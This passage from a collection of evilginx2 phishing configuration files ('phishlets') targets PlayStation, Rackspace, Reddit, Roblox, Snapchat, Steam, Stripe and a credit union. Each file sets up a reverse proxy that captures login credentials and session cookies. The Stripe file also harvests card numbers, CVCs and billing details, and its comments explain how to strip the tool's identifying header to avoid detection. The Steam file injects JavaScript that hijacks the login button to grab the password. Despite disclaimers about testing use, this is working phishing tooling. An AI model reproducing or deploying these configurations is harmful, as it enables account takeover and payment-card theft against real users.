15 |   - {triggers_on: 'id.sonyentertainmentnetwork.com', orig_sub: 'id', domain: 'sonyentertainmentnetwork.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
16 |   - {triggers_on: 'id.sonyentertainmentnetwork.com', orig_sub: 'auth.api', domain: 'sonyentertainmentnetwork.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
17 |   - {triggers_on: 'id.sonyentertainmentnetwork.com', orig_sub: 'www', domain: 'playstation.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
18 |   - {triggers_on: 'id.sonyentertainmentnetwork.com', orig_sub: 'accounts.api', domain: 'playstation.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
19 | 
20 | 
21 |   - {triggers_on: 'www.playstation.com', orig_sub: 'id', domain: 'sonyentertainmentnetwork.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
22 |   - {triggers_on: 'www.playstation.com', orig_sub: 'auth.api', domain: 'sonyentertainmentnetwork.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
23 |   - {triggers_on: 'www.playstation.com', orig_sub: 'www', domain: 'playstation.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
24 | 
25 | 
26 | auth_tokens:
27 |   - domain: '.sonyentertainmentnetwork.com'
28 |     keys: ['bm_sz,opt','_abck,opt','s_cc,opt','s_sq']
29 |   - domain: 'auth.api.sonyentertainmentnetwork.com'
30 |     keys: ['JSESSIONID']
31 |   - domain: 'id.sonyentertainmentnetwork.com'
32 |     keys: ['akacd_pdr-id2-sencom-bdl,opt']
33 |        
34 | credentials:
35 |   username:
36 |     key: 'username'
37 |     search: '(.*)'
38 |     type: 'post'
39 |   password:
40 |     key: 'password'
41 |     search: '(.*)'
42 |     type: 'post'
43 | login:
44 |   domain: 'id.sonyentertainmentnetwork.com'
45 |   path: '/signin/'
46 | 


--------------------------------------------------------------------------------
/rackspace.yaml:
--------------------------------------------------------------------------------
 1 | 
 2 | author: '@An0nud4y' 
 3 | min_ver: '2.3.0'
 4 | proxy_hosts:
 5 |   - {phish_sub: 'login', orig_sub: 'login', domain: 'rackspace.com', session: true, is_landing: true}
 6 |   - {phish_sub: '', orig_sub: '', domain: 'rackspace.com', session: true, is_landing: false}
 7 | 
 8 | sub_filters:
 9 |   - {triggers_on: 'login.rackspace.com', orig_sub: 'login', domain: 'rackspace.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
10 |   - {triggers_on: 'login.rackspace.com', orig_sub: '', domain: 'rackspace.com', search: 'https://{hostname}/', replace: 'https://{hostname}/', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript']}
11 | 
12 | 
13 | auth_tokens:
14 |   - domain: 'login.rackspace.com'
15 |     keys: ['.*,regexp']
16 | auth_urls:
17 |   - ''  
18 | credentials:
19 |   username:
20 |     key: 'name="username"'
21 |     search: '(.*)'
22 |     type: 'post'
23 |   password:
24 |     key: 'name="password"'
25 |     search: '(.*)'
26 |     type: 'post'
27 | login:
28 |   domain: 'login.rackspace.com'
29 |   path: '/login' 
30 |   
31 | 


--------------------------------------------------------------------------------
/reddit.yaml:
--------------------------------------------------------------------------------
 1 | author: '@customsync'
 2 | min_ver: '2.3.0'
 3 | proxy_hosts:
 4 |   - {phish_sub: 'www', orig_sub: 'www', domain: 'reddit.com', session: true, is_landing: true}
 5 |   - {phish_sub: 'win', orig_sub: 'www', domain: 'redditstatic.com', session: false, is_landing: false}
 6 |   - {phish_sub: 'events', orig_sub: 'events', domain: 'reddit.com', session: false, is_landing: false}
 7 | sub_filters:
 8 |   - {triggers_on: 'www.reddit.com', orig_sub: 'www', domain: 'reddit.com', search: 'action="https://{hostname}', replace: 'action="https://{hostname}', mimes: ['text/html', 'application/json']}
 9 |   - {triggers_on: 'www.reddit.com', orig_sub: 'www', domain: 'reddit.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json']}
10 |   - {triggers_on: 'www.redditstatic.com', orig_sub: 'www', domain: 'redditstatic.com', search: 'action="https://{hostname}', replace: 'action="https://{hostname}', mimes: ['text/html', 'application/json']}
11 |   - {triggers_on: 'www.redditstatic.com', orig_sub: 'www', domain: 'redditstatic.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json']}
12 |   - {triggers_on: 'www.redditstatic.com', orig_sub: 'www', domain: 'redditstatic.com', search: 'src="https://{hostname}', replace: 'src="https://{hostname}', mimes: ['text/html', 'application/json']}
13 |   - {triggers_on: 'events.reddit.com', orig_sub: 'www', domain: 'reddit.com', search: 'action="https://{hostname}', replace: 'action="https://{hostname}', mimes: ['text/html', 'application/json']}
14 |   - {triggers_on: 'events.reddit.com', orig_sub: 'www', domain: 'reddit.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json']}
15 | auth_tokens:
16 |   - domain: '.reddit.com'
17 |     keys: ['reddit_session']
18 | credentials:
19 |   username:
20 |     key: 'username'
21 |     search: '(.*)'
22 |     type: 'post'
23 |   password:
24 |     key: 'password'
25 |     search: '(.*)'
26 |     type: 'post'
27 | login:
28 |   domain: 'www.reddit.com'
29 |   path: '/login'
30 | 


--------------------------------------------------------------------------------
/roblox.yaml:
--------------------------------------------------------------------------------
 1 | # AUTHOR OF THIS PHISHLET WILL NOT BE RESPONSIBLE FOR ANY MISUSE OF THIS PHISHLET, PHISHLET IS MADE ONLY FOR TESTING/SECURITY/EDUCATIONAL PURPOSES.
 2 | # PLEASE DO NOT MISUSE THIS PHISHLET.
 3 | 
 4 | author: '@AN0NUD4Y'
 5 | min_ver: '2.3.0'
 6 | proxy_hosts:
 7 |   - {phish_sub: 'www', orig_sub: 'www', domain: 'roblox.com', session: true, is_landing: true}
 8 |   - {phish_sub: '', orig_sub: '', domain: 'roblox.com', session: true, is_landing: false}
 9 |   - {phish_sub: 'assetgame', orig_sub: 'assetgame', domain: 'roblox.com', session: true, is_landing: false}
10 |   - {phish_sub: 'auth', orig_sub: 'auth', domain: 'roblox.com', session: true, is_landing: false}
11 |   - {phish_sub: 'metrics', orig_sub: 'metrics', domain: 'roblox.com', session: true, is_landing: false}
12 |   - {phish_sub: 'realtime', orig_sub: 'realtime', domain: 'roblox.com', session: true, is_landing: false}
13 |   - {phish_sub: 'apis', orig_sub: 'apis', domain: 'roblox.com', session: true, is_landing: false}
14 |   - {phish_sub: 'locale', orig_sub: 'locale', domain: 'roblox.com', session: true, is_landing: false}
15 |   - {phish_sub: 'accountsettings', orig_sub: 'accountsettings', domain: 'roblox.com', session: true, is_landing: false}
16 |   - {phish_sub: 'js', orig_sub: 'js', domain: 'rbxcdn.com', session: true, is_landing: false}
17 |   - {phish_sub: 'ecsv2', orig_sub: 'ecsv2', domain: 'roblox.com', session: true, is_landing: false}
18 |   - {phish_sub: 'contacts', orig_sub: 'contacts', domain: 'roblox.com', session: true, is_landing: false}
19 |   - {phish_sub: 'thumbnails', orig_sub: 'thumbnails', domain: 'roblox.com', session: true, is_landing: false}
20 |   - {phish_sub: 'contacts', orig_sub: 'contacts', domain: 'roblox.com', session: true, is_landing: false}
21 |   - {phish_sub: 'chat', orig_sub: 'chat', domain: 'roblox.com', session: true, is_landing: false}
22 |   - {phish_sub: 'notifications', orig_sub: 'notifications', domain: 'roblox.com', session: true, is_landing: false}
23 |   - {phish_sub: 'economy', orig_sub: 'economy', domain: 'roblox.com', session: true, is_landing: false}
24 |   - {phish_sub: 'friends', orig_sub: 'friends', domain: 'roblox.com', session: true, is_landing: false}
25 | 
26 | sub_filters:
27 |   - {triggers_on: 'www.roblox.com', orig_sub: '', domain: 'roblox.com', search: '{domain}', replace: '{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
28 |   - {triggers_on: 'www.roblox.com', orig_sub: '', domain: 'rbxcdn.com', search: '{domain}', replace: '{domain}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
29 | 
30 |   - {triggers_on: 'www.roblox.com', orig_sub: 'www', domain: 'roblox.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
31 |   - {triggers_on: 'www.roblox.com', orig_sub: 'www', domain: 'roblox.com', search: 'https://{hostname_regexp}', replace: 'https://{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
32 |   - {triggers_on: 'www.roblox.com', orig_sub: 'www', domain: 'roblox.com', search: 'https%3A%2F%2F{hostname_regexp}', replace: 'https%3A%2F%2F{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
33 | 
34 |   - {triggers_on: 'www.roblox.com', orig_sub: 'auth', domain: 'roblox.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
35 |   - {triggers_on: 'www.roblox.com', orig_sub: 'auth', domain: 'roblox.com', search: 'https://{hostname_regexp}', replace: 'https://{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
36 |   - {triggers_on: 'www.roblox.com', orig_sub: 'auth', domain: 'roblox.com', search: 'https%3A%2F%2F{hostname_regexp}', replace: 'https%3A%2F%2F{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
37 | 
38 |   - {triggers_on: 'www.roblox.com', orig_sub: 'apis', domain: 'roblox.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
39 |   - {triggers_on: 'www.roblox.com', orig_sub: 'apis', domain: 'roblox.com', search: 'https://{hostname_regexp}', replace: 'https://{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
40 |   - {triggers_on: 'www.roblox.com', orig_sub: 'apis', domain: 'roblox.com', search: 'https%3A%2F%2F{hostname_regexp}', replace: 'https%3A%2F%2F{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
41 | 
42 |   - {triggers_on: 'www.roblox.com', orig_sub: 'metrics', domain: 'roblox.com', search: '{hostname_regexp}', replace: '{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
43 |   - {triggers_on: 'www.roblox.com', orig_sub: 'metrics', domain: 'roblox.com', search: 'https://{hostname_regexp}', replace: 'https://{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
44 |   - {triggers_on: 'www.roblox.com', orig_sub: 'metrics', domain: 'roblox.com', search: 'https%3A%2F%2F{hostname_regexp}', replace: 'https%3A%2F%2F{hostname_regexp}', mimes: ['text/html', 'application/json', 'application/javascript', 'application/x-javascript', 'application/ecmascript', 'text/javascript', 'text/ecmascript', 'multipart/form-data']}
45 | 
46 | auth_tokens:
47 |   - domain: '.roblox.com'
48 |     keys: ['GuestData', '.ROBLOSECURITY','RBXSessionTracker','.*,regexp']
49 |   - domain: '.www.roblox.com'
50 |     keys: ['gig_canary','gig_canary_ver' ,'.*,regexp']
51 | 
52 | auth_urls:
53 |   - '/home'
54 |   - '/home/.*'
55 | credentials:
56 |   username:
57 |     key: 'cvalue'
58 |     search: '(.*)'
59 |     type: 'post'
60 |   password:
61 |     key: 'password'
62 |     search: '(.*)'
63 |     type: 'post'
64 |   custom:
65 |     - key: 'ctype'
66 |       search: '(.*)'
67 |       type: 'post'    
68 |     
69 | login:
70 |   domain: 'www.roblox.com'
71 |   path: '/Login'


--------------------------------------------------------------------------------
/snapchat.yaml:
--------------------------------------------------------------------------------
 1 | # AUTHOR OF THIS PHISHLET WILL NOT BE RESPONSIBLE FOR ANY MISUSE OF THIS PHISHLET, PHISHLET IS MADE ONLY FOR TESTING/SECURITY/EDUCATIONAL PURPOSES.
 2 | # PLEASE DO NOT MISUSE THIS PHISHLET.
 3 | 
 4 | author: '@an0nud4y'
 5 | min_ver: '2.3.0'
 6 | proxy_hosts:
 7 |   - {phish_sub: 'accounts', orig_sub: 'accounts', domain: 'snapchat.com', session: true, is_landing: true}
 8 |   - {phish_sub: '', orig_sub: '', domain: 'snapchat.com', session: true, is_landing: false}
 9 |   - {phish_sub: 'www', orig_sub: 'www', domain: 'snapchat.com', session: true, is_landing: false}
10 |   - {phish_sub: 'csp-central', orig_sub: 'csp-central', domain: 'appspot.com', session: true, is_landing: false}
11 | 
12 | sub_filters:
13 |   - {triggers_on: 'accounts.snapchat.com', orig_sub: 'accounts', domain: 'snapchat.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true}
14 |   - {triggers_on: 'accounts.snapchat.com', orig_sub: 'accounts', domain: 'snapchat.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
15 |   - {triggers_on: 'accounts.snapchat.com', orig_sub: 'accounts', domain: 'snapchat.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
16 |   - {triggers_on: 'accounts.snapchat.com', orig_sub: 'www', domain: 'snapchat.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true}
17 |   - {triggers_on: 'accounts.snapchat.com', orig_sub: 'www', domain: 'snapchat.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
18 |   - {triggers_on: 'accounts.snapchat.com', orig_sub: 'www', domain: 'snapchat.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
19 |   - {triggers_on: 'accounts.snapchat.com', orig_sub: 'csp-central', domain: 'appspot.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true}
20 |   - {triggers_on: 'accounts.snapchat.com', orig_sub: 'csp-central', domain: 'appspot.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
21 |   - {triggers_on: 'accounts.snapchat.com', orig_sub: 'csp-central', domain: 'appspot.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
22 | 
23 | auth_tokens:
24 |   - domain: '.snapchat.com'
25 |     keys: ['sc-a-nonce', '.*,regexp']      
26 |   - domain: 'accounts.snapchat.com'
27 |     keys: ['web_client_id', 'sc-cookies-accepted', 'sc-a-csrf', 'sc-a-session', 'xsrf_token', '.*,regexp']     
28 | auth_urls:
29 |   - '/accounts/welcome'  
30 | credentials:
31 |   username:
32 |     key: 'username'
33 |     search: '(.*)'
34 |     type: 'post'
35 |   password:
36 |     key: 'password'
37 |     search: '(.*)'
38 |     type: 'post'
39 | login:
40 |   domain: 'accounts.snapchat.com'
41 |   path: '/accounts/login'
42 | 


--------------------------------------------------------------------------------
/steam.yaml:
--------------------------------------------------------------------------------
 1 | # AUTHOR OF THIS PHISHLET WILL NOT BE RESPONSIBLE FOR ANY MISUSE OF THIS PHISHLET, PHISHLET IS MADE ONLY FOR TESTING/SECURITY/EDUCATIONAL PURPOSES.
 2 | # PLEASE DO NOT MISUSE THIS PHISHLET.
 3 | 
 4 | author: '@An0nud4y'
 5 | min_ver: '2.3.0'
 6 | proxy_hosts:
 7 |   - {phish_sub: '', orig_sub: '', domain: 'steamcommunity.com', session: true, is_landing: true}
 8 | 
 9 | sub_filters:
10 |   - {triggers_on: 'steamcommunity.com', orig_sub: 'login', domain: 'steamcommunity.com', search: 'https://{hostname}/ppsecure/', replace: 'https://{hostname}/ppsecure/', mimes: ['text/html$
11 | 
12 | auth_tokens:
13 |   - domain: 'steamcommunity.com'
14 |     keys: ['xf_user', 'xf_session']
15 | 
16 | credentials:
17 |   username:
18 |     key: 'username'
19 |     search: '(.*)'
20 |     type: 'post'
21 |   password:
22 |     key: 'unenc_password'
23 |     search: '(.*)'
24 | 
25 | login:
26 |   domain: 'steamcommunity.com'
27 |   path: '/login/home/'
28 |   
29 | js_inject:
30 |   - trigger_domains: ["steamcommunity.com"]
31 |     trigger_paths: ["/login/home/"]
32 |     trigger_params: []
33 |     script: |  
34 |      function onclickListener(){
35 |       var submit = document.querySelectorAll('button[type=submit]')[0];
36 |       submit.setAttribute("onclick", "sendPass()");
37 |       return;
38 |       }
39 |      function sendPass(){
40 |       var password = document.getElementsByName("password")[0].value;
41 |       var xhr = new XMLHttpRequest();
42 |       xhr.open("POST", '/login/device-based/regular/login/', true);
43 |       xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
44 |       xhr.send("unenc_password="+encodeURIComponent(password));
45 |       return;
46 |       }
47 |       setTimeout(function(){ onclickListener(); }, 2500);  
48 |       
49 |       
50 |       
51 | # AUTHOR OF THIS PHISHLET WILL NOT BE RESPONSIBLE FOR ANY MISUSE OF THIS PHISHLET, PHISHLET IS MADE ONLY FOR TESTING/SECURITY/EDUCATIONAL PURPOSES.
52 | # PLEASE DO NOT MISUSE THIS PHISHLET.
53 |       


--------------------------------------------------------------------------------
/stripe.yaml:
--------------------------------------------------------------------------------
  1 | # Checkout Docs for reference
  2 | # https://stripe.com/docs/connect/creating-a-payments-page?destination-or-on-behalf-of=destination
  3 | 
  4 | # Steps to follow to integrate evilginx checkout in original payment checkout page
  5 | #
  6 | # 1) Replace all occurences of stripe.com in html files or in js files with evilginx2 domain
  7 | # 2) Read docs for other possible issues (Mentioned Above)
  8 | # 3) Also look at domain name stripe.network and change it with evilginx domain in all js and html files in checkout page of website.
  9 | # 4) Handling lure is difficult and will require a heavy evilginx2 source code modification, Alternate solution is to inject js in the website index or any page which will trigger the evilginx2 lure and create a valid evilginx session for that user.
 10 | # 
 11 | 
 12 | 
 13 | 
 14 | # Checkout Page -
 15 | #
 16 | # https://checkout.stripe.com/c/pay/cs_live_b1VLOZemyS8VFjpL7CKqeF83LqaFkITaQd2uWgK0fdZ4D2qF5PBtN9itwh#fidkdWxOYHwnPyd1blppbHNgWmM0dDRLQF9IYDxNQ2c2U3VsYUZVfDJDYycpJ2hsYXYnP34nYnBsYSc%2FJ0tEJyknaHBsYSc%2FJzw9ZDw8MWRkKGY8MGcoMTQyPChkMGNgKDcwPDQwNTA2MzVgN2M3YGdmNycpJ3ZsYSc%2FJzZjZ2NkZDA9KGQ8YWAoMTVjZihnNzA9KDwxYDAzNzAwNjQ8ZzAzN2YwMid4KSdnYHFkdic%2FXlgpJ2lkfGpwcVF8dWAnPydocGlxbFpscWBoJyknd2BjYHd3YHdKd2xibGsnPydtcXF1dj8qKnJycitof3ZubGsrZmpoJ3gl
 17 | 
 18 | 
 19 | ## List of SubDomains ---
 20 | # https://m.stripe.com
 21 | # https://m.stripe.network/
 22 | # https://js.stripe.com
 23 | # https://q.stripe.com
 24 | # https://api.stripe.com/
 25 | # https://r.stripe.com/
 26 | # https://stripe-camo.global.ssl.fastly.net/
 27 | # https://checkout.stripe.com
 28 | 
 29 | 
 30 | 
 31 | 
 32 | 
 33 | # Note: Do not Forget to remove the easter egg codes from evilginx2 (http_proxy.go),
 34 | # Search for 'cantFindMe' and 'egg' in http_proxy.go and comment all relevent code to remove the evilginx header (X-Evilginx)
 35 | 
 36 | 
 37 | name: 'stripe'
 38 | author: '@an0nud4y'
 39 | min_ver: '2.4.0'
 40 | proxy_hosts:
 41 |   - {phish_sub: 'checkout', orig_sub: 'checkout', domain: 'stripe.com', session: true, auto_filter: true, is_landing: true}
 42 |   - {phish_sub: 'm', orig_sub: 'm', domain: 'stripe.com', session: false, auto_filter: true, is_landing:false}
 43 |   - {phish_sub: 'm', orig_sub: 'm', domain: 'stripe.network', session: false, auto_filter: true, is_landing:false}
 44 |   - {phish_sub: 'js', orig_sub: 'js', domain: 'stripe.com', session: false, auto_filter: true, is_landing:false}
 45 |   - {phish_sub: 'q', orig_sub: 'q', domain: 'stripe.com', session: false, auto_filter: true, is_landing:false}
 46 |   - {phish_sub: 'api', orig_sub: 'api', domain: 'stripe.com', session: false, auto_filter: true, is_landing:false}
 47 |   - {phish_sub: 'r', orig_sub: 'r', domain: 'stripe.com', session: false, auto_filter: true, is_landing:false}
 48 |   - {phish_sub: 'stripe-camo.global.ssl', orig_sub: 'stripe-camo.global.ssl', domain: 'fastly.net', session: false, auto_filter: true, is_landing:false}
 49 | 
 50 | sub_filters:
 51 |   - {triggers_on: 'checkout.stripe.com', orig_sub: 'checkout', domain: 'stripe.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript']}
 52 |   - {triggers_on: 'checkout.stripe.com', orig_sub: 'checkout', domain: 'stripe.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'application/json', 'application/javascript'], redirect_only: true}
 53 | 
 54 | auth_tokens:
 55 |   - domain: '.stripe.com'
 56 |     keys: ['.*,regexp'] 
 57 |   - domain: 'm.stripe.com'
 58 |     keys: ['.*,regexp']       
 59 |   - domain: 'stripe.com'
 60 |     keys: ['.*,regexp'] 
 61 | 
 62 | credentials:
 63 |   username:
 64 |     key: 'card[number]'
 65 |     search: '(.*)'
 66 |     type: 'post'
 67 |   password:
 68 |     key: 'card[cvc]'
 69 |     search: '(.*)'
 70 |     type: 'post'
 71 |   custom:
 72 |     - key: 'type'
 73 |       search: '(.*)'
 74 |       type: 'post'
 75 |     - key: 'card[number]'
 76 |       search: '(.*)'
 77 |       type: 'post'
 78 |     - key: 'card[cvc]'
 79 |       search: '(.*)'
 80 |       type: 'post'
 81 |     - key: 'card[exp_month]'
 82 |       search: '(.*)'
 83 |       type: 'post'
 84 |     - key: 'card[exp_year]'
 85 |       search: '(.*)'
 86 |       type: 'post'
 87 |     - key: 'billing_details[name]'
 88 |       search: '(.*)'
 89 |       type: 'post'
 90 |     - key: 'billing_details[email]'
 91 |       search: '(.*)'
 92 |       type: 'post'
 93 |     - key: 'guid'
 94 |       search: '(.*)'
 95 |       type: 'post'
 96 |     - key: 'muid'
 97 |       search: '(.*)'
 98 |       type: 'post'
 99 |     - key: 'sid'
100 |       search: '(.*)'
101 |       type: 'post'
102 |     - key: 'payment_user_agent'
103 |       search: '(.*)'
104 |       type: 'post'
105 | 
106 |      
107 | auth_urls:
108 |   - '/'
109 |   - '/c'
110 |   
111 | login:
112 |   domain: 'checkout.stripe.com'
113 |   path: '/' 
114 | 


--------------------------------------------------------------------------------
/sununion.yaml:
--------------------------------------------------------------------------------
1 | author: '@an0nud4y'
min_ver: '2.3.0'
proxy_hosts:
  - {phish_sub: 'www', orig_sub: 'www', domain: 'suncoastcreditunion.com', session: true, is_landing: true}
  - {phish_sub: '', orig_sub: '', domain: 'suncoastcreditunion.com', session: true, is_landing: false}
  - {phish_sub: 'banking', orig_sub: 'banking', domain: 'suncoastcreditunion.com', session: true, is_landing: false}
 
sub_filters:
  - {triggers_on: 'www.suncoastcreditunion.com', orig_sub: '', domain: 'suncoastcreditunion.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
  - {triggers_on: 'www.suncoastcreditunion.com', orig_sub: '', domain: 'suncoastcreditunion.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
  - {triggers_on: 'www.suncoastcreditunion.com', orig_sub: '', domain: 'suncoastcreditunion.com', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
  - {triggers_on: 'www.suncoastcreditunion.com', orig_sub: 'www', domain: 'suncoastcreditunion.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
  - {triggers_on: 'www.suncoastcreditunion.com', orig_sub: 'www', domain: 'suncoastcreditunion.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
  - {triggers_on: 'www.suncoastcreditunion.com', orig_sub: 'www', domain: 'suncoastcreditunion.com', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
  - {triggers_on: 'www.suncoastcreditunion.com', orig_sub: 'banking', domain: 'suncoastcreditunion.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
  - {triggers_on: 'www.suncoastcreditunion.com', orig_sub: 'banking', domain: 'suncoastcreditunion.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
  - {triggers_on: 'www.suncoastcreditunion.com', orig_sub: 'banking', domain: 'suncoastcreditunion.com', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
  - {triggers_on: 'banking.suncoastcreditunion.com', orig_sub: '', domain: 'suncoastcreditunion.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
  - {triggers_on: 'banking.suncoastcreditunion.com', orig_sub: '', domain: 'suncoastcreditunion.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
  - {triggers_on: 'banking.suncoastcreditunion.com', orig_sub: '', domain: 'suncoastcreditunion.com', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
  - {triggers_on: 'banking.suncoastcreditunion.com', orig_sub: 'www', domain: 'suncoastcreditunion.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
  - {triggers_on: 'banking.suncoastcreditunion.com', orig_sub: 'www', domain: 'suncoastcreditunion.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
  - {triggers_on: 'banking.suncoastcreditunion.com', orig_sub: 'www', domain: 'suncoastcreditunion.com', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
  - {triggers_on: 'banking.suncoastcreditunion.com', orig_sub: 'banking', domain: 'suncoastcreditunion.com', search: '{hostname}', replace: '{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
  - {triggers_on: 'banking.suncoastcreditunion.com', orig_sub: 'banking', domain: 'suncoastcreditunion.com', search: 'https://{hostname}', replace: 'https://{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
  - {triggers_on: 'banking.suncoastcreditunion.com', orig_sub: 'banking', domain: 'suncoastcreditunion.com', search: 'https%3A%2F%2F{hostname}', replace: 'https%3A%2F%2F{hostname}', mimes: ['text/html', 'text/javascript', 'application/json', 'application/javascript', 'application/x-javascript', 'multipart/form-data']}
 
auth_tokens:
  - domain: '.suncoastcreditunion.com'
    keys: ['.*,regexp']
  - domain: 'banking.suncoastcreditunion.com'
    keys: ['.*,regexp']
  - domain: '.banking.suncoastcreditunion.com'
    keys: ['.*,regexp']
  - domain: 'suncoastcreditunion.com'
    keys: ['.*,regexp'] 
  - domain: 'www.suncoastcreditunion.com'
    keys: ['.*,regexp']    

auth_urls:
  - '/*'
  - '/'
  
credentials:
